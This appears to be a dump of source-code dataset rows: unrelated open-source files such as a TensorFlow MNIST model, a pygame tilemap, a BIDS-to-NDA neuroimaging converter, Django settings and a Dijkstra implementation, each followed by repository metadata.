super(MnistModel, self).__init__(config)
self.build_model()
self.init_saver()
def build_model(self):
"""
Build the Tensorflow model
:param self
:return none
:raises none
"""
batch_size = self.config['batch_size']
self.is_training = tf.placeholder(tf.bool)
# declare the training data placeholders
# input x - for 28 x 28 pixels = 784
self.x = tf.placeholder(tf.float32, [None, 784])
# now declare the output data placeholder - 10 digits
self.y = tf.placeholder(tf.float32, [None, 10])
# now declare the weights connecting the input to the hidden layer
self.W1 = tf.Variable(tf.random_normal([784, 300], stddev=0.03), name='W1')
self.b1 = tf.Variable(tf.random_normal([300]), name='b1')
# and the weights connecting the hidden layer to the output layer
self.W2 = tf.Variable(tf.random_normal([300, 10], stddev=0.03), name='W2')
self.b2 = tf.Variable(tf.random_normal([10]), name='b2')
# calculate the output of the hidden layer
self.hidden_out = tf.add(tf.matmul(self.x, self.W1), self.b1)
self.hidden_out = tf.nn.relu(self.hidden_out)
        # now calculate the output layer - in this case, let's use a softmax activated output layer
self.y_ = tf.nn.softmax(tf.add(tf.matmul(self.hidden_out, self.W2), self.b2))
# define the loss function
self.y_clipped = tf.clip_by_value(self.y_, 1e-10, 0.9999999)
self.cross_entropy = -tf.reduce_mean(tf.reduce_sum(self.y * tf.log(self.y_clipped) + (1 - self.y) * tf.log(1 - self.y_clipped), axis=1))
# add an optimiser
self.optimiser = tf.train.GradientDescentOptimizer(learning_rate=self.config['learning_rate']).minimize(self.cross_entropy)
# define an accuracy assessment operation
self.correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
def init_saver(self):
"""
Initialize the tensorflow saver that will be used in saving the checkpoints.
:param self
:return none
:raises none
"""
self.saver = tf.train.Saver(max_to_keep=self.config['max_to_keep'])
| 33.27907
| 144
| 0.621593
| 2,665
| 0.931167
| 0
| 0
| 0
| 0
| 0
| 0
| 1,122
| 0.392034
|
772b333423680d442d0295b333722d5a3ecb17ce
| 2,388
|
py
|
Python
|
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
import pygame as pg
from settings import *
import pytmx
class Map:
def __init__(self, filename):
self.data = []
with open(filename, 'rt') as f:
for line in f:
self.data.append(line.strip())
self.tilewidth = len(self.data[0])
self.tileheight = len(self.data)
self.width = self.tilewidth * TILESIZE
self.height = self.tileheight * TILESIZE
class TiledMap:
def __init__(self, filename):
tm = pytmx.load_pygame(filename, pixelalpha=True)
self.width = tm.width * tm.tilewidth
self.height = tm.height * tm.tileheight
self.tmxdata = tm
def render(self, surface):
# tile data
ti = self.tmxdata.get_tile_image_by_gid
# For each layer look for each tile and draw on surface
for layer in self.tmxdata.visible_layers:
if isinstance(layer, pytmx.TiledTileLayer):
for x, y, gid, in layer:
tile = ti(gid)
if tile:
surface.blit(tile, (x * self.tmxdata.tilewidth,
y * self.tmxdata.tileheight))
def make_map(self):
temp_surface = pg.Surface((self.width, self.height))
self.render(temp_surface)
return temp_surface
class Camera:
def __init__(self, width, height):
self.camera = pg.Rect(0, 0, width, height)
self.width = width
self.height = height
def apply(self, entity):
        # Shift the entity's rect by the camera offset
return entity.rect.move(self.camera.topleft)
def apply_rect(self, rect):
return rect.move(self.camera.topleft)
def update(self, player_sprite):
# center player sprite on screen
x = -player_sprite.rect.x + int(WIDTH / 2)
y = -player_sprite.rect.y + int(HEIGHT / 2)
# Limit the map scrolling when sprite reaches end point of map
# For left boundary
x = min(0, x)
# For right boundary
x = max(-(self.width - WIDTH), x)
# For top boundary
y = min(0, y) # checks if y < 0
# For bottom boundary
y = max(-(self.height - HEIGHT), y)
# Adjust camera rectangle
self.camera = pg.Rect(x, y, self.width, self.height)
| 32.712329
| 74
| 0.562395
| 2,311
| 0.967755
| 0
| 0
| 0
| 0
| 0
| 0
| 347
| 0.14531
|
772bff3df8d91dc18f1f77932eab53991f3d258d
| 768
|
py
|
Python
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 67
|
2017-10-25T11:08:59.000Z
|
2022-02-25T18:04:36.000Z
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 107
|
2017-02-03T16:50:53.000Z
|
2022-03-18T04:18:14.000Z
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 11
|
2018-09-11T11:05:44.000Z
|
2022-02-13T10:37:09.000Z
|
try:
import pathlib
except ImportError as e:
try:
import pathlib2 as pathlib
except ImportError:
raise e
def name_to_asserted_group_path(name):
path = pathlib.PurePosixPath(name)
if path.is_absolute():
raise NotImplementedError(
"Absolute paths are currently not supported and unlikely to be implemented."
)
if len(path.parts) < 1 and str(name) != ".":
raise NotImplementedError(
"Getting an item on a group with path '" + name + "' " +
"is not supported and unlikely to be implemented."
)
return path
def remove_root(name):
path = pathlib.PurePosixPath(name)
if path.is_absolute():
path = path.relative_to(path.root)
return path
| 24.774194
| 88
| 0.628906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 173
| 0.22526
|
772c7aa25a9dad643c71fd03ef2e8fca224182d9
| 15,292
|
py
|
Python
|
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | null | null | null |
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | null | null | null |
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | 1
|
2018-08-22T15:51:33.000Z
|
2018-08-22T15:51:33.000Z
|
#!/usr/bin/env python
#
# import modules used here -- sys is a very standard one
from __future__ import print_function
import argparse
import csv
import logging
import zipfile
from collections import OrderedDict
from glob import glob
import os
import sys
import nibabel as nb
import json
import pandas as pd
import numpy as np
# Gather our code in a main() function
from shutil import copy
def get_metadata_for_nifti(bids_root, path):
#TODO support .nii
sidecarJSON = path.replace(".nii.gz", ".json")
pathComponents = os.path.split(sidecarJSON)
filenameComponents = pathComponents[-1].split("_")
sessionLevelComponentList = []
subjectLevelComponentList = []
topLevelComponentList = []
ses = None;
sub = None;
for filenameComponent in filenameComponents:
if filenameComponent[:3] != "run":
sessionLevelComponentList.append(filenameComponent)
if filenameComponent[:3] == "ses":
ses = filenameComponent
else:
subjectLevelComponentList.append(filenameComponent)
if filenameComponent[:3] == "sub":
sub = filenameComponent
else:
topLevelComponentList.append(filenameComponent)
topLevelJSON = os.path.join(bids_root, "_".join(topLevelComponentList))
potentialJSONs = [topLevelJSON]
subjectLevelJSON = os.path.join(bids_root, sub, "_".join(subjectLevelComponentList))
potentialJSONs.append(subjectLevelJSON)
if ses:
sessionLevelJSON = os.path.join(bids_root, sub, ses, "_".join(sessionLevelComponentList))
potentialJSONs.append(sessionLevelJSON)
potentialJSONs.append(sidecarJSON)
merged_param_dict = {}
for json_file_path in potentialJSONs:
if os.path.exists(json_file_path):
param_dict = json.load(open(json_file_path, "r"))
merged_param_dict.update(param_dict)
return merged_param_dict
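# Note (added for clarity): the JSONs are merged top-level first, then subject-level,
# then session-level (if any), and finally the scan's own sidecar, so keys in more
# specific files override the more general ones, mirroring BIDS metadata inheritance.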
def dict_append(d, key, value):
if key in d:
d[key].append(value)
else:
d[key] = [value, ]
def run(args):
guid_mapping = dict([line.split(" - ") for line in open(args.guid_mapping).read().split("\n") if line != ''])
suffix_to_scan_type = {"dwi": "MR diffusion",
"bold": "fMRI",
#""MR structural(MPRAGE)",
"T1w": "MR structural (T1)",
"PD": "MR structural (PD)",
#"MR structural(FSPGR)",
"T2w": "MR structural (T2)",
"T2map": "MR structural (T2)",
"T2star": "MR: T2star",
"FLAIR": "MR: FLAIR",
"asl": "ASL",
"FLASH": "MR structural (FLASH)",
#PET;
#microscopy;
#MR structural(PD, T2);
#MR structural(B0 map);
#MR structural(B1 map);
#single - shell DTI;
#multi - shell DTI;
"epi": "Field Map",
"phase1": "Field Map",
"phase2": "Field Map",
"phasediff": "Field Map",
"magnitude1": "Field Map",
"magnitude2": "Field Map",
"fieldmap": "Field Map"
#X - Ray
}
units_dict = {"mm": "Millimeters",
"sec": "Seconds",
"msec": "Milliseconds"}
participants_df = pd.read_csv(os.path.join(args.bids_directory, "participants.tsv"), header=0, sep="\t")
participants_df['age'] = participants_df.age.astype(str).str.rstrip('Y').str.lstrip('0')
image03_dict = OrderedDict()
for file in glob(os.path.join(args.bids_directory, "sub-*", "*", "sub-*.nii.gz")) + \
glob(os.path.join(args.bids_directory, "sub-*", "ses-*", "*", "sub-*_ses-*.nii.gz")):
metadata = get_metadata_for_nifti(args.bids_directory, file)
bids_subject_id = os.path.split(file)[-1].split("_")[0][4:]
dict_append(image03_dict, 'subjectkey', guid_mapping[bids_subject_id])
dict_append(image03_dict, 'src_subject_id', bids_subject_id)
sub = file.split("sub-")[-1].split("_")[0]
if "ses-" in file:
ses = file.split("ses-")[-1].split("_")[0]
scans_file = (os.path.join(args.bids_directory, "sub-" + sub, "ses-" + ses, "sub-" + sub + "_ses-" + ses + "_scans.tsv"))
else:
scans_file = (os.path.join(args.bids_directory, "sub-" + sub, "sub-" + sub + "_scans.tsv"))
if os.path.exists(scans_file):
scans_df = pd.read_csv(scans_file, header=0, sep="\t")
else:
print("%s file not found - information about scan date required by NDA could not be found." % scans_file)
sys.exit(-1)
for (_, row) in scans_df.iterrows():
if file.endswith(row["filename"].replace("/", os.sep)):
date = row.acq_time
break
sdate = date.split("-")
ndar_date = sdate[1] + "/" + sdate[2].split("T")[0] + "/" + sdate[0]
dict_append(image03_dict, 'interview_date', ndar_date)
interview_age = int(round(float(participants_df[participants_df.participant_id == "sub-" + sub].age.values[0]), 0)*12)
dict_append(image03_dict, 'interview_age', interview_age)
sex = list(participants_df[participants_df.participant_id == "sub-" + sub].sex)[0]
dict_append(image03_dict, 'gender', sex)
dict_append(image03_dict, 'image_file', file)
suffix = file.split("_")[-1].split(".")[0]
if suffix == "bold":
description = suffix + " " + metadata["TaskName"]
dict_append(image03_dict, 'experiment_id', metadata.get("ExperimentID", args.experiment_id))
else:
description = suffix
dict_append(image03_dict, 'experiment_id', '')
dict_append(image03_dict, 'image_description', description)
dict_append(image03_dict, 'scan_type', suffix_to_scan_type[suffix])
dict_append(image03_dict, 'scan_object', "Live")
dict_append(image03_dict, 'image_file_format', "NIFTI")
dict_append(image03_dict, 'image_modality', "MRI")
dict_append(image03_dict, 'scanner_manufacturer_pd', metadata.get("Manufacturer", ""))
dict_append(image03_dict, 'scanner_type_pd', metadata.get("ManufacturersModelName", ""))
dict_append(image03_dict, 'scanner_software_versions_pd', metadata.get("SoftwareVersions", ""))
dict_append(image03_dict, 'magnetic_field_strength', metadata.get("MagneticFieldStrength", ""))
dict_append(image03_dict, 'mri_echo_time_pd', metadata.get("EchoTime", ""))
dict_append(image03_dict, 'flip_angle', metadata.get("FlipAngle", ""))
dict_append(image03_dict, 'receive_coil', metadata.get("ReceiveCoilName", ""))
plane = metadata.get("ImageOrientationPatient","")
        get_orientation = lambda plane: ['Axial','Coronal','Sagittal'][np.argmax(plane[:3])]  # the original parameter name "place" was unused
dict_append(image03_dict, 'image_orientation',get_orientation(plane))
dict_append(image03_dict, 'transformation_performed', 'Yes')
dict_append(image03_dict, 'transformation_type', 'BIDS2NDA')
nii = nb.load(file)
dict_append(image03_dict, 'image_num_dimensions', len(nii.shape))
dict_append(image03_dict, 'image_extent1', nii.shape[0])
dict_append(image03_dict, 'image_extent2', nii.shape[1])
dict_append(image03_dict, 'image_extent3', nii.shape[2])
if suffix == "bold":
extent4_type = "time"
elif suffix == "dwi":
extent4_type = "diffusion weighting"
else:
extent4_type = ""
dict_append(image03_dict, 'extent4_type', extent4_type)
dict_append(image03_dict, 'acquisition_matrix', "%g x %g" %(nii.shape[0], nii.shape[1]))
dict_append(image03_dict, 'image_resolution1', nii.header.get_zooms()[0])
dict_append(image03_dict, 'image_resolution2', nii.header.get_zooms()[1])
dict_append(image03_dict, 'image_resolution3', nii.header.get_zooms()[2])
dict_append(image03_dict, 'image_slice_thickness', nii.header.get_zooms()[2])
dict_append(image03_dict, 'photomet_interpret', metadata.get("global",{}).get("const",{}).get("PhotometricInterpretation","MONOCHROME2"))
if len(nii.shape) > 3:
image_extent4 = nii.shape[3]
image_resolution4 = nii.header.get_zooms()[3]
image_unit4 = units_dict[nii.header.get_xyzt_units()[1]]
if image_unit4 == "Milliseconds":
TR = nii.header.get_zooms()[3]/1000.
else:
TR = nii.header.get_zooms()[3]
else:
image_resolution4 = ""
image_unit4 = ""
image_extent4 = ""
TR = metadata.get("RepetitionTime", "")
slice_timing = metadata.get("SliceTiming", "")
dict_append(image03_dict, 'image_extent4', image_extent4)
dict_append(image03_dict, 'slice_timing', slice_timing)
dict_append(image03_dict, 'image_unit4', image_unit4)
dict_append(image03_dict, 'mri_repetition_time_pd', TR)
dict_append(image03_dict, 'image_resolution4', image_resolution4)
dict_append(image03_dict, 'image_unit1', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'image_unit2', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'image_unit3', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'mri_field_of_view_pd', "%g x %g %s" % (nii.header.get_zooms()[0],
nii.header.get_zooms()[1],
units_dict[nii.header.get_xyzt_units()[0]]))
dict_append(image03_dict, 'patient_position', 'head first-supine')
if file.split(os.sep)[-1].split("_")[1].startswith("ses"):
visit = file.split(os.sep)[-1].split("_")[1][4:]
else:
visit = ""
dict_append(image03_dict, 'visit', visit)
if len(metadata) > 0 or suffix in ['bold', 'dwi']:
_, fname = os.path.split(file)
zip_name = fname.split(".")[0] + ".metadata.zip"
zip_path = os.path.join(args.output_directory, zip_name)
zip_path_exists = os.path.exists(zip_path)
if not zip_path_exists or (zip_path_exists and args.overwrite_zips):
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.writestr(fname.replace(".nii.gz", ".json"), json.dumps(metadata, indent=4, sort_keys=True))
if suffix == "bold":
#TODO write a more robust function for finding those files
events_file = file.split("_bold")[0] + "_events.tsv"
arch_name = os.path.split(events_file)[1]
if not os.path.exists(events_file):
task_name = file.split("_task-")[1].split("_")[0]
events_file = os.path.join(args.bids_directory, "task-" + task_name + "_events.tsv")
if os.path.exists(events_file):
zipf.write(events_file, arch_name)
dict_append(image03_dict, 'data_file2', zip_path)
dict_append(image03_dict, 'data_file2_type', "ZIP file with additional metadata from Brain Imaging "
"Data Structure (http://bids.neuroimaging.io)")
else:
dict_append(image03_dict, 'data_file2', "")
dict_append(image03_dict, 'data_file2_type', "")
if suffix == "dwi":
# TODO write a more robust function for finding those files
bvec_file = file.split("_dwi")[0] + "_dwi.bvec"
if not os.path.exists(bvec_file):
bvec_file = os.path.join(args.bids_directory, "dwi.bvec")
if os.path.exists(bvec_file):
dict_append(image03_dict, 'bvecfile', bvec_file)
else:
dict_append(image03_dict, 'bvecfile', "")
bval_file = file.split("_dwi")[0] + "_dwi.bval"
if not os.path.exists(bval_file):
bval_file = os.path.join(args.bids_directory, "dwi.bval")
if os.path.exists(bval_file):
dict_append(image03_dict, 'bvalfile', bval_file)
else:
dict_append(image03_dict, 'bvalfile', "")
if os.path.exists(bval_file) or os.path.exists(bvec_file):
dict_append(image03_dict, 'bvek_bval_files', 'Yes')
else:
dict_append(image03_dict, 'bvek_bval_files', 'No')
else:
dict_append(image03_dict, 'bvecfile', "")
dict_append(image03_dict, 'bvalfile', "")
dict_append(image03_dict, 'bvek_bval_files', "")
# all values of image03_dict should be the same length.
# Fail when this is not true instead of when the dataframe
# is created.
assert(len(set(map(len,image03_dict.values()))) ==1)
image03_df = pd.DataFrame(image03_dict)
with open(os.path.join(args.output_directory, "image03.txt"), "w") as out_fp:
out_fp.write('"image"\t"3"\n')
image03_df.to_csv(out_fp, sep="\t", index=False, quoting=csv.QUOTE_ALL)
def main():
class MyParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
parser = MyParser(
description="BIDS to NDA converter.",
fromfile_prefix_chars='@')
# TODO Specify your real parameters here.
parser.add_argument(
"bids_directory",
help="Location of the root of your BIDS compatible directory",
metavar="BIDS_DIRECTORY")
parser.add_argument('-e', '--experiment_id', default=None,
help = ("Functional scans require an experiment_id. If ExperimentID is not"
" found in the scan metadata this value is used"))
parser.add_argument('-o', '--overwrite_zips', action='store_true',
help = ("If a conversion has already been performed, the default is "
"to avoid rewriting each zip file generated and instead just rewrite image03.txt"))
parser.add_argument(
"guid_mapping",
help="Path to a text file with participant_id to GUID mapping. You will need to use the "
"GUID Tool (https://ndar.nih.gov/contribute.html) to generate GUIDs for your participants.",
metavar="GUID_MAPPING")
parser.add_argument(
"output_directory",
help="Directory where NDA files will be stored",
metavar="OUTPUT_DIRECTORY")
args = parser.parse_args()
run(args)
print("Metadata extraction complete.")
if __name__ == '__main__':
main()
| 44.069164
| 145
| 0.587889
| 182
| 0.011902
| 0
| 0
| 0
| 0
| 0
| 0
| 3,850
| 0.251766
|
772cd907b931f0cbf42463265dfc425aa87bcb15
| 226
|
py
|
Python
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 159
|
2017-10-02T22:03:14.000Z
|
2022-03-10T23:02:22.000Z
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 9
|
2019-02-04T14:55:09.000Z
|
2021-06-05T13:30:28.000Z
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 49
|
2017-09-29T17:51:16.000Z
|
2022-03-10T23:12:17.000Z
|
def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
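# Illustrative usage (not from the original file): the sort is in place.
#   L = [3, 1, 2]; bubblesort(L); L == [1, 2, 3]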
| 25.111111
| 43
| 0.446903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
772d6d4f45275295dcb92a649c3abaa349cebcf6
| 431
|
py
|
Python
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 1
|
2021-02-01T10:38:16.000Z
|
2021-02-01T10:38:16.000Z
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 3
|
2021-02-02T11:06:16.000Z
|
2021-02-06T11:44:19.000Z
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 4
|
2021-01-31T10:57:23.000Z
|
2021-02-02T06:16:35.000Z
|
import math


class threshold:
    # Note: the original body was MATLAB syntax (||, end, .*); rewritten here as plain Python.
    def threshold(num, threshold):
        """Round num up when its fractional part exceeds threshold, otherwise round it down."""
        if threshold < 0 or threshold >= 1:
            raise ValueError('threshold input must be in the range [0, 1)')
        fractional = num - math.floor(num)
        if fractional > threshold:
            result = num + (1 - fractional)
        else:
            result = num - fractional
        return result
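# Illustrative usage (not from the original file):
#   threshold.threshold(2.75, 0.5) == 3.0   # fractional part 0.75 > 0.5, round up
#   threshold.threshold(2.25, 0.5) == 2.0   # fractional part 0.25 <= 0.5, round down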
| 26.9375
| 71
| 0.556845
| 421
| 0.976798
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.102088
|
7730282673237879a35fb5efc177b9a2f6881b87
| 514
|
py
|
Python
|
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | 3
|
2019-03-12T03:38:13.000Z
|
2021-03-15T16:48:49.000Z
|
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | null | null | null |
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | 2
|
2022-01-05T11:43:42.000Z
|
2022-03-16T00:05:19.000Z
|
from .base import *
import os
import dj_database_url
ALLOWED_HOSTS = ['*']
DEBUG = False
MIDDLEWARE += [
'whitenoise.middleware.WhiteNoiseMiddleware'
]
INSTALLED_APPS = [
'whitenoise.runserver_nostatic',
] + INSTALLED_APPS
DATABASES = {
'default': dj_database_url.config()
}
EMAIL_USE_TLS = True
EMAIL_HOST = os.environ.get('EMAIL_HOST')
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')
EMAIL_PORT = os.environ.get('EMAIL_PORT')
| 17.133333
| 59
| 0.743191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.289883
|
77319ed1468248ddab354a491c37c6712455692a
| 1,175
|
py
|
Python
|
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | 1
|
2021-06-13T09:06:24.000Z
|
2021-06-13T09:06:24.000Z
|
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | null | null | null |
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
"""
Notes:
- It's great that you've used functions even though we haven't reached that part of the course.
Also, the naming of the function is clear and a good variable name.
- Typically, the docstring for the function starts immediately after the triple quote otherwise we
introduce a newline (\n) in the documentation, which doesn't look good. I've corrected it below.
- The 'return' variable in the docstring is not correct since your program actually returns None (you can test this)
- Trivial point: to preserve the order of modules, name them problem0.py,...,problem9.py; this way they will always appear in order
- Feel free to include additional testing modules if you need to though you don't have to commit them to the repo.
"""
def print_name_age():
"""Ask user name and age and print out the result"""
name = input("Please enter your name: ")
age = input("Please enter your age in years: ")
print(f"Your name is {name} and you are {age} years old")
def main():
v = print_name_age()
# print(f"the return value of 'print_name_age()' is {v}")
return os.EX_OK
if __name__ == "__main__":
sys.exit(main())
| 37.903226
| 131
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 970
| 0.825532
|
7731f6b63900ac030b3e3491a417310c77c7bf81
| 2,313
|
py
|
Python
|
Graphs/dijkstra_algorithm.py
|
hemraj4545/Data-Structures-and-Algorithms-in-Python
|
633062369ceb3c9c1627f7e826243be7a84d4a7e
|
[
"MIT"
] | 3
|
2019-10-05T07:11:06.000Z
|
2021-08-04T12:15:39.000Z
|
Graphs/dijkstra_algorithm.py
|
Satyagovind/Data-Structures-and-Algorithms-in-Python
|
e13becf63097e86dc073bc2de3b8d5586623743d
|
[
"MIT"
] | 5
|
2019-10-03T08:51:34.000Z
|
2020-11-19T11:49:13.000Z
|
Graphs/dijkstra_algorithm.py
|
Satyagovind/Data-Structures-and-Algorithms-in-Python
|
e13becf63097e86dc073bc2de3b8d5586623743d
|
[
"MIT"
] | 6
|
2019-09-25T17:59:34.000Z
|
2021-07-17T05:58:14.000Z
|
"""
>>> G = Graph(6)
>>> G.insert(0, 1, 3)
>>> G.insert(0, 2, 7)
>>> G.insert(0, 4, 8)
>>> G.insert(0, 5, 1)
>>> G.insert(1, 2, 2)
>>> G.insert(1, 4, 13)
>>> G.insert(2, 3, 15)
>>> G.insert(3, 5, 17)
>>> G.insert(4, 5, 9)
>>> G.dijkstra(0)[0]
[0, 3, 5, 20, 8, 1]
>>> G.shortest_distance(1, 5)
[1, 4, 5]
"""
"""
Lazy implementation of Dijkstra's Algorithm.
In this implementation we lazily check every (node, distance) pair popped from the queue,
even if a better distance for a given node already exists (i.e. stale duplicates remain in the queue).
The priority queue keeps entries sorted in ascending order of distance.
"""
from sys import maxsize
import heapq
from collections import defaultdict as dd
class Graph:
def __init__(self, vertices):
# Using defaultdict to avoid key error
self.adjmat = dd(dict)
self.vertices = vertices
for i in range(vertices):
self.adjmat[i] = dd(int)
def insert(self, u, v, w=1):
        # Edge from u to v with weight w, since this is a directed graph
self.adjmat[u][v] = w
def dijkstra(self, source):
vis = [False for i in range(self.vertices)]
dist = [maxsize for i in range(self.vertices)]
prev = [None for i in range(self.vertices)]
dist[source] = 0
pq = list()
        heapq.heappush(pq, (0, source))  # push via heapq (the original used list.append, which breaks the heap invariant)
while len(pq) > 0:
# Pop the node with shortest distance
mindist, node = heapq.heappop(pq)
vis[node] = True
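            # Lazy deletion: a stale queue entry (the node was already settled with a
            # smaller distance) is skipped here rather than removed from the queue eagerly.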
if dist[node] < mindist:
continue
for i in self.adjmat[node].keys():
if vis[i]:
continue
new_dist = dist[node] + self.adjmat[node][i] # Add present distance with weight of the edge
if new_dist < dist[i]: # If better path is found
prev[i] = node
dist[i] = new_dist
                    heapq.heappush(pq, (new_dist, i))
return dist, prev # Return minimum distance of each node from source.
def shortest_distance(self, s, e):
dist, prev = self.dijkstra(s)
path = list()
if dist[e] == maxsize:
return path
i = e
while i is not None:
path.append(i)
i = prev[i]
return path[::-1]
| 30.84
| 108
| 0.531345
| 1,585
| 0.685257
| 0
| 0
| 0
| 0
| 0
| 0
| 890
| 0.384782
|
7732a52cf70bb1c65299ac307a32800ed068e230
| 854
|
py
|
Python
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 14
|
2017-05-20T04:06:46.000Z
|
2022-01-23T06:48:45.000Z
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 1
|
2021-06-10T20:17:55.000Z
|
2021-06-10T20:17:55.000Z
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 15
|
2017-03-29T17:57:33.000Z
|
2021-08-24T02:20:08.000Z
|
# Example of faking classes with a closure
import sys
class ClosureInstance:
def __init__(self, locals=None):
if locals is None:
locals = sys._getframe(1).f_locals
# Update instance dictionary with callables
self.__dict__.update((key,value) for key, value in locals.items()
if callable(value) )
# Redirect special methods
def __len__(self):
return self.__dict__['__len__']()
# Example use
def Stack():
items = []
def push(item):
items.append(item)
def pop():
return items.pop()
def __len__():
return len(items)
return ClosureInstance()
if __name__ == '__main__':
s = Stack()
print(s)
s.push(10)
s.push(20)
s.push('Hello')
print(len(s))
print(s.pop())
print(s.pop())
print(s.pop())
| 20.829268
| 73
| 0.580796
| 406
| 0.47541
| 0
| 0
| 0
| 0
| 0
| 0
| 150
| 0.175644
|
7732d1b5ac77c6e2332d3fe38f546a806fa00262
| 434
|
py
|
Python
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 14
|
2017-05-04T17:22:30.000Z
|
2020-01-23T06:30:19.000Z
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 1
|
2020-05-16T06:28:02.000Z
|
2020-05-16T06:28:02.000Z
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 6
|
2017-09-13T19:30:35.000Z
|
2021-07-26T14:41:57.000Z
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
U{array<http://docs.python.org/library/array.html>} adapter module.
Will convert all array.array instances to a python list before encoding. All
type information is lost (but degrades nicely).
@since: 0.5
"""
from __future__ import absolute_import
import array
import miniamf
from miniamf.adapters import util
miniamf.add_type(array.ArrayType, util.to_list)
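# Illustrative sketch (not part of the original module). Once the adapter above
# is registered, encoding an array.array should produce the same AMF bytes as
# encoding the equivalent list; the encode() call assumes miniamf keeps PyAMF's
# top-level encode helper.
#
#   import array
#   import miniamf
#
#   miniamf.encode(array.array('i', [1, 2, 3])).getvalue() \
#       == miniamf.encode([1, 2, 3]).getvalue()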
| 21.7
| 76
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.640553
|
77331bed5a7248d07a4fb3851abb1699ae7ce662
| 929
|
py
|
Python
|
KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 7
|
2020-07-28T06:53:02.000Z
|
2022-03-18T05:23:03.000Z
|
KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 1
|
2020-11-25T16:13:26.000Z
|
2020-11-25T16:13:26.000Z
|
